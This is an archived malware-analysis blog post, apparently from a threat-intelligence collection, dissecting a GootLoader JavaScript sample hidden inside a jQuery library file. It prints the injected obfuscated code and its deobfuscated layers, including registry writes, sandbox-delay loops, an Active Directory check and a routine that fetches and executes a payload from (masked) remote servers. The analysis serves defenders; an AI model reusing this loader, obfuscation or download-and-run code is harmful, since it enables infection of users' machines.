{ "id": "bf323d93-f2ef-4b20-af7a-f1c2f19f2c32", "created_at": "2026-04-06T00:11:02.988608Z", "updated_at": "2026-04-10T03:20:40.047297Z", "deleted_at": null, "sha1_hash": "387d13b579a9a76f887c788d2e9886dbbc9761ef", "title": "Loading GootLoader", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 945207, "plain_text": "Loading GootLoader\r\nBy Niranjan Hegde\r\nPublished: 2022-06-05 · Archived: 2026-04-05 23:14:14 UTC\r\nDisclaimer: Opinions expressed are solely my own. None of the ideas expressed in this blog post are shared,\r\nsupported, or endorsed in any manner by my employer.\r\nIn this blog, I will be taking a look at the initial GootLoader sample (MD5: 4dd369b5e028beebe3aa5c980960c502 ,\r\nSha256: c1029f0b5f4f6dfbe0fe656f075cbb5ccc2fc308087db21438d73394b75ea020). \r\nAvailable here: https://bazaar.abuse.ch/sample/c1029f0b5f4f6dfbe0fe656f075cbb5ccc2fc308087db21438d73394b75ea020/ \r\nThe sample is a javascript program which is meant to be executed in windows using wscript.exe. \r\nOpening the sample in a text editor, it appears to look like jquery library 3.6.0 (screenshot below).\r\nComparing the sample with jqeury 3.6.0 downloaded from https://code.jquery.com/jquery-3.6.0.js, differences can be\r\nobserved. \r\nThe following lines shows the code inserted to create the sample: \r\nout4(6670);\r\nfunction describe5(dance5, glass5, village9, list3) {\r\nreturn dance5.length;\r\nhttps://dinohacks.blogspot.com/2022/06/loading-gootloader.html\r\nPage 1 of 10\n\n}\r\nfunction out4(board94, wood9, nose8, seem0) {\r\njoin2 = [(2431)];\r\npresent4(join2);\r\n}\r\nfunction record9(is2, kill4, value8) {\r\nseat07(2187);\r\ncity0 = 1;\r\njoin2[5066387] = death3;\r\nphrase2 = city0;\r\nweight5 = phrase2 + city0 * phrase2 + city0;\r\n}\r\nfunction poem2(fast5, where3, had0, near0, choose7, made7, grand0) {\r\nspend1 = fast5;\r\nreturn spend1.substr(where3, had0);\r\n}\r\nfunction death3(first8, east3, black99) {\r\nthrough4 = \"OMemd\";\r\nshop4 = live4(back59(rub4), through4);\r\njoin2[6004566] = soil6;\r\n}\r\nfunction gone068(does7, boy1) {\r\ncome0 = 0;\r\nexperience7 = 'yerntr} ;C5(1.=q7te)cpi ti';\r\nthese9 = ' )ne}(oh)cct;alc e}s t;h)';\r\nexample7 = '.utt\\\"s\\\\pa )it=+\\\\s\\\"(=.(\\\"=\\\\+m S)(2h\\\\ \\\"e0fr\\\"0\\\\ci))S +\\\\}\\\"({';\r\nhttps://dinohacks.blogspot.com/2022/06/loading-gootloader.html\r\nPage 2 of 10\n\nvoice6 = 'ti;Srf)Wi ((n(d g(nfsxei(.s (i.;\\\"n';\r\ntell2 = '\\\\-o)D1t\\\\O\\\"n)\\\"u\\\\ gs){z\\\\+\\\"? ((\\\"W\\\\[\\\"S\\\\)+cM()rAg\\\"i\\\\n\\\"p\\\\ipt)';\r\nsurprise1 = ']e) \\\"(e=\\\"p( +a)z\\\"rt \\\"s(;+e)]\\\"Ii\\\\\\\"\\\"(';\r\nsyllable42 = 'Sentctierle i{b pyfr';\r\nrather0 = ' (E=ntx rcpmuea.tjnrebderOEs enp{tv';\r\ncloud2 = 'v aelfsj(u]bJn[O4cpeothtsi{a o';\r\nmoney0 = 'yrgoktac=usrhtospn4o;c ';\r\nmodern2 = 'tto;.\\\"s\\\\Q\\\\sguReFirn\\\\t\\\\t\\\"(+h))\\\"g\\\";(i+ )l\\\"}R.E Sw\\\"}(';\r\nmove8 = '+()o\\\" EmRe\\\"C(l h,i\\\"a\\\"h r,w4Ce gou;hd(0';\r\nadd6 = 'a)((r\\\"+\\\\ \\\")\\\\sT\\\\I\\\"E Ne\\\"=\\\\S% (.\\\"x\\\\2+.';\r\nsleep3 = 't( \\\"a\\\\e\\\"M\\\\le %st=Ue/ S \\\"B\\\\{E ( \\\";\\\\x+)) ])+=z\\\\(\\\"[';\r\nmatch9 = 'o{nr; 7c6r-S0e7W=tJ ;u)=)r\\\" Zn\\\"m( + )S\\\"{St';\r\nworld9 = '\\\\)md%2 eU+;xS8)OE9ef\\\",\\\\(s2)\\\\l\\\"+(a@(]f\\\\\\\"\\\"\\\\) +R\\\\,\\\"DBBr';\r\nice3 = 'o)aineers(roehCnTc.mettexapntcit;}rS c';\r\ncame7 = '\\\")(n[+9ir3ett0tle)lu ;{s ';\r\nsheet4 = ' (\\\" \\\\+;vl)eal\\\\s\\\"\\\"r\\\\Wl )\\\\a\\\")xf(. ';\r\nwall1 = '(i+k)p\\\"aUt\\\"-(.+g)s\\\"nCl_iYe\\\"p(e+p';\r\nsign9 = 'w+ )w\\\"eU\\\\_\\\"\\\"l(,+s)\\\\\\\"\\\"TeNeE \\\"d({+.) \\\"lRW\\\"l(S+e)c\\\"uRr\\\"t';\r\nlife1 = '\\\" (r+))i\\\"3_n\\\" (g+\u003c).\\\" Gf\\\"z(r';\r\nspeed7 = 'WrSccSrWi p=t .9srleetetpe(l2;26973912';\r\nheat1 = 'n+k)t\\\"ur(W.gq\\\"o(,+c)1\\\".e0Rg';\r\nbook6 = ')p\\\"oE(Kh\\\"1(s+2)e\\\"3Hv\\\"4(i 5=l ';\r\nshore0 = '(1+.\\\\7\\\\m)3d \\\\5\\\"{{8Sy21Mr}\\\"\\\\\\\\\\\"t);( /}(\\'g(t2,ec';\r\nmeant6 = ' \\\"P\\\\xHTR.+TDr)\\\\\\\"\\\"\\\\e\\\"(\\\\p)+/l+)/a(\\\\\\\"\\\"\\\\c\\\"H\\\\e(LN(+MS\\\\)\\\"\\\"\\\\\\\\\\\"\\\"@\\\\()\\\\:\\\"+';\r\nwe6 = '\\\"+\\\\t+\\\\)\\\"\\\"\\\\\\\\\\\"+@=((\\\\x\\\"\\\"+\\\\,q)N l\\\\S\\\"p0\\\"s\\\\)yb))t\\\\+\\\"m=((p=\\\"+';\r\nserve7 = '(w+()\\\\\\\"\\\"ase,R)\\\"\\\\(\\\"+()t\\\")gee;Rn\\\" (.[W9gr';\r\nround4 = '+s+()pB\\\"\\\\\\\\\\\"t+DX\\\"\\\\\\\\\\\"Or(@\\\"e\\\\\\\\+\\\")\\\\)\\\"+,\\\"(\\\\\\\\(\\\"t+\\\"\\\\\\\\\\\"h)M)\\\"\\\\\\\\\\\"A;(v\\\" \\\\r v)\\\\,\\\"+';\r\nstraight4 = 'W \\\"\\'()t)c(e)j;b}Oceattacehr(Ce.)t{p}i';\r\nhttps://dinohacks.blogspot.com/2022/06/loading-gootloader.html\r\nPage 3 of 10\n\npast6 = '5=1n5m0n)l;yxcbdnmaeqMgO';\r\nnoun59 = '\\\\(%2pm\\\"3\\\\o.2)dt3)ns2 a\\\")\\\\r!;(.= +h })';\r\nhurry2 = 'rh.+t\\\"s\\\\S(l(o\\\"e\\\\t+eI.)pN)\\\"(';\r\nrock9 = 'n4oeigpulh4(.][)w\\\"3dw\\\"]';\r\nhas8 = ')L)r)\\\\\\\"\\\"\\\\e (Gp{+\\\"l\\\\)Ba(\\\\=\\\"(cBMne+Xe(\\\"\\\\\\\\\\\"p/4(o';\r\ncontrol8 = ')4.e;gwu hw;})w\\\" l\\\\l\\\"ezh[S+. t+p=i;r c}SH';\r\ncertain87 = add6 + has8 + shore0 + cloud2 + experience7;\r\nfamily4 = match9 + life1 + move8;\r\nlarge7 = speed7 + past6 + money0;\r\nhit1 = sleep3 + meant6 + round4;\r\nfeet8 = we6 + tell2 + hurry2 + noun59;\r\nfresh3 = rock9 + serve7 + syllable42 + modern2 + sign9;\r\nshoe8 = surprise1 + heat1 + came7 + these9;\r\nbat8 = wall1 + book6;\r\nspecial8 = control8 + straight4;\r\nstead8 = example7 + sheet4 + rather0 + ice3 + voice6 + world9;\r\nrub4 = stead8 + feet8 + hit1 + certain87 + family4 + shoe8 + fresh3 + bat8 + special8 + large7;\r\njoin2[4833602] = record9;\r\nseat07(6030);\r\n}\r\nfunction vowel8(well3, poor4, view87, hill8) {\r\nreturn well3 % (weight5 - phrase2);\r\n}\r\nfunction visit0(white2, course9, except1, include76, stop4, insect9) {\r\nif (vowel8(except1)) have2 = white2 + course9;\r\nelse have2 = course9 + white2;\r\nreturn have2;\r\nhttps://dinohacks.blogspot.com/2022/06/loading-gootloader.html\r\nPage 4 of 10\n\n}\r\nfunction soil6(was2, fell4, noise8, broke48) {\r\njoin2[6904665] = law1;\r\nshop4[weight5] = gone068[shop4[come0]];\r\n}\r\nfunction present4() {\r\nslave2 = back59;\r\nat9 = 4543;\r\nseat07(80947);\r\nwhile (gone068 = gone068) {\r\ntry {\r\njoin2[at9](at9);\r\n} catch (egg4) {\r\njoin2[2120844] = gone068;\r\n}\r\nat9++\r\n}\r\n}\r\nfunction trouble8(coast6, similar7, push89, both2) {\r\nreturn poem2(coast6, similar7, city0);\r\n}\r\nfunction law1(glad6, drink7, order05, hour8) {\r\nshop4[weight5](shop4[phrase2])(join2);\r\n}\r\nfunction seat07(sugar9, spell0, stay1, inch6, cow2) {\r\ndry1 = 69;\r\nhttps://dinohacks.blogspot.com/2022/06/loading-gootloader.html\r\nPage 5 of 10\n\nwhile (dry1 \u003c (sugar9 * 4652)) {\r\ndry1++\r\n}\r\n}\r\nfunction live4(car6, particular4, tone0, why6, yard09, cotton8) {\r\ndesign8 = [];\r\nbear6 = come0;\r\nbegin4 = describe5(particular4);\r\nfor (rain9 = come0; rain9 \u003c= describe5(car6) - begin4; rain9++) {\r\nif (poem2(car6, rain9, begin4) == particular4) {\r\ndesign8[describe5(design8)] = poem2(car6, bear6, rain9 - bear6);\r\nbear6 = rain9 + begin4;\r\n}\r\n}\r\ndesign8[describe5(design8)] = poem2(car6, bear6);\r\nreturn design8;\r\n}\r\nfunction back59(took3) {\r\nheld8 = come0;\r\nwrote0 = \"\";\r\nwhile (held8 \u003c 2341) {\r\noil9 = trouble8(took3, held8);\r\nwrote0 = visit0(wrote0, oil9, held8);\r\nheld8++;\r\n}\r\nreturn wrote0;\r\n}\r\nhttps://dinohacks.blogspot.com/2022/06/loading-gootloader.html\r\nPage 6 of 10\n\nOne important thing to mention about javascript: If a variable is declared without keywords such as var, it will be\r\ntreated as global variable. \r\nAfter reading the code, following points can be observed: \r\nFunction seat07() is incrementing a variable in a loop. The incremented variable is not referred in any part of the\r\ncode. This is most likely done to increase the execution time and thus timeout sandbox detection. Commenting\r\nout the function would speed up the execution.\r\nFunction gone068() contains the obfuscated string which is likely deobfuscated and executed. Generally,\r\ndeobfuscated string would require one of the following to be executed:\r\neval()\r\nfunction constructor \r\nwindow object  \r\nIt would be interesting to see how deobfuscated string is executed in this sample.\r\nFunction law1() and present4() are quite interesting because they are accessing array elements and making a call.\r\nThey could be used to call deobfuscating routine and execute the deobfuscated string. \r\nAfter adding breakpoints and running the program in a javascript debugger, first layer of the GootLoader becomes\r\nclear: \r\nfunction anonymous() {\r\ncylnmn = 2976;\r\nletter9 = WScript.CreateObject(\"WScript.Shell\");\r\nhuge4 = (\"H\") + (\"KE\") + (\"Y_C\") + (\"U\") + (\"R\") + (\"R\") + (\"ENT\") + (\"_U\") + (\"SER\") + (\"\") + \"\\\\rFRg\\\\\";\r\ntry {\r\nletter9[(\"Reg\") + (\"Rea\") + (\"d\")](huge4);\r\n} catch (e) {\r\nletter9[(\"Re\") + (\"gWr\") + (\"i\") + (\"t\") + (\"e\")](huge4, \"\", (\"RE\") + (\"G\") + (\"_\") + (\"S\") + (\"Z\"));\r\nJ = 70 - 67;\r\nnotice7 = 15;\r\n}\r\ntry {\r\nshop4[J](slave2('} ;t\\\"r1y8{5 3m7.1o4p\\\"e+nB(=(B\\\"{G \\\")))+\\\"(%\\\"NEIT\\\"\\\"()+,) \\\"(A\\\"Mh\\\"t(\\\"+))+\\\"\r\n(O\\\"Dt\\\"p(s+:)\\\"\\\")S+N(\\\"\\\"(/+/)\\\"\\\")D+RH\\\"[(z+])+\\\"(E\\\"S/Ut%e\\\"\\\"() +=(!\\\" s)t).\\\"p%\\\"N)I+\\\"\r\n((\\\"+h)p\\\"\\\"A)M+\\\"\\\"(?+z)g\\\"nOtDo\\\"p(m+t)y\\\"pSlNq\\\"x(=+\\\")+\\\"BD,R \\\"f(a+l)s\\\"eE)S;U %m\\\".(s(esngdn(i)r;t\r\nS}tcnaetmcnho(rei)v{n ErdentauprxnE .f)a)l\\\"slel;\\\" (}+ )i\\\"fe h(Sm\\\".(s+t)a\\\"t.utsp i=\\\"=(=+ )2\\\"0r0c)S \\\"{(\r\n+v)a\\\"rW \\\"x( (=t cme.jrbeOseptoanesreCT.etxpti;r ciSfW (( (fxi. i;n)d2e+x8O9f,(2\\\"(@]\\\")+\\\"Br+t\\\"\\\"@(\\\"+,)\r\n\\\"0s)b)\\\"=(=+-)1\\\")u s{\\\" (W[S)c(rginpitr.tsSloete.p)((2m3o2d3n2a)r;. h}t aeMl s=e B{ ;x) )=\\\"\r\nhttps://dinohacks.blogspot.com/2022/06/loading-gootloader.html\r\nPage 7 of 10\n\nPxT.Tr\\\"e(p+l)a\\\"cHeL(M\\\"\\\"@(\\\"++)B\\\"+X\\\"r@e\\\"\\\",(\\\"+\\\"))\\\";v rv\\\"a(r+ )s\\\" e=S\r\n.x2.Lr\\\"e(p+l)a\\\"cMeX(\\\"/((+\\\\)d\\\"{S2M}\\\")(/(gt,c efjubnOcettiaoenr C(.qt)p i{r crSeWt u=r nm S{t r)i3n g\u003c.\r\nfzr(o meClhiahrwC o;d0e (=p azr s;e]I\\\"nktu(.qo,c1.0g)n+i3t0l)u;s n}o)c;l esthnoipl4.[w3w]w(\\\"s,)\\\"(t)e;n\r\n.WgSncireibpfto.sQsueintt(h)g;i l}. w}w we\\\"l,s\\\"ee d{. lWlSecurtikpat-.gsnliepeppo(h1s2e3v4i5l).;w w}w\r\n\\\"z[+ +=; }H '))();\r\n} catch (e) {}\r\nWScript.sleep(229315150);\r\nxbnaqgygka = shop4;\r\n}\r\nFollowing points can be observed:\r\nDeobfuscated strings are executed using function constructor.\r\nIt contains obfuscated string which needs to be deobfuscated. \r\nIt also seems to be accessing the registry: HKEY_CURRENT_USER  \r\nDeobfuscating the string in first layer reveals the second layer of GootLoader: \r\nH = [\"www.-------.de\", \"www.----------.net\", \"www.---------.co.uk\"];\r\nz = 0;\r\nwhile (z \u003c 3) {\r\nm = WScript.CreateObject((\"MS\") + (\"XM\") + (\"L2.Se\") + (\"rv\") + (\"erX\") + (\"MLH\") + (\"TTP\"));\r\nB = Math.random().toString()[(\"su\") + (\"bs\") + (\"tr\")](2, 98 + 2);\r\nif (WScript.CreateObject((\"W\") + (\"Scr\") + (\"ipt.\") + (\"She\") + (\"ll\")).ExpandEnvironmentStrings((\"%USE\") +\r\n(\"RD\") + (\"NS\") + (\"DO\") + (\"MA\") + (\"IN%\")) != (\"%USE\") + (\"RD\") + (\"NS\") + (\"DO\") + (\"MA\") +\r\n(\"IN%\")) {\r\nB = B + \"4173581\";\r\n}\r\ntry {\r\nm.open((\"G\") + (\"ET\"), (\"ht\") + (\"tps:\") + (\"//\") + H[z] + (\"/te\") + (\"st.p\") + (\"hp\") + \"?zgntopmtyplqx=\" + B,\r\nfalse);\r\nm.send();\r\n} catch (e) {\r\nreturn false;\r\n}\r\nhttps://dinohacks.blogspot.com/2022/06/loading-gootloader.html\r\nPage 8 of 10\n\nif (m.status === 200) {\r\nvar x = m.responseText;\r\nif ((x.indexOf(\"@\" + B + \"@\", 0)) == -1) {\r\nWScript.sleep(23232);\r\n} else {\r\nx = x.replace(\"@\" + B + \"@\", \"\");\r\nvar s = x.replace(/(\\d{2})/g, function (q) {\r\nreturn String.fromCharCode(parseInt(q, 10) + 30);\r\n});\r\nshop4[3](s)();\r\nWScript.Quit();\r\n}\r\n} else {\r\nWScript.sleep(12345);\r\n}\r\nz++;\r\n}\r\nThe following points can be noted: \r\nIt checks if the environment variable userdnsdomain is set which would indicate that the system is part of AD. \r\nIf active directory is set, then it would add the string \"4173581\" to parameter value in its requests.\r\nThe C2 communication would look something like this:\r\nGET request to server with path: test.php?zgntopmtyplqx=\r\nThe parameter will be \u003crandom value\u003e4173581 if computer is part of AD otherwise only \u003crandom\r\nvalue\u003e \r\nIf the http response status code is anything other than 200, it would sleep for 12345 milliseconds and\r\ncheck for another domain. \r\nIf the http response status code is 200, then it would look for the string :  \"@\u003cparameter value sent\u003e@\" in\r\nthe response text. \r\nif it is not present, then it will sleep for 23232 milliseconds. \r\nIf it is present, then it will do the following:\r\nRemove the string \"@\u003cparameter value sent\u003e@\" in the response text. \r\nResponse text is likely to be series of numbers which are parsed as integers then converted\r\nto ascii strings which are then deobfuscated. \r\nhttps://dinohacks.blogspot.com/2022/06/loading-gootloader.html\r\nPage 9 of 10\n\nIf you are interested to read about this campaign, you can read the following blogs:\r\nhttps://news.sophos.com/en-us/2021/03/01/gootloader-expands-its-payload-delivery-options/ \r\nhttps://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/\r\nHave a nice Day! \r\nSource: https://dinohacks.blogspot.com/2022/06/loading-gootloader.html\r\nhttps://dinohacks.blogspot.com/2022/06/loading-gootloader.html\r\nPage 10 of 10", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://dinohacks.blogspot.com/2022/06/loading-gootloader.html" ], "report_names": [ "loading-gootloader.html" ], "threat_actors": [], "ts_created_at": 1775434262, "ts_updated_at": 1775791240, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/387d13b579a9a76f887c788d2e9886dbbc9761ef.pdf", "text": "https://archive.orkl.eu/387d13b579a9a76f887c788d2e9886dbbc9761ef.txt", "img": "https://archive.orkl.eu/387d13b579a9a76f887c788d2e9886dbbc9761ef.jpg" } }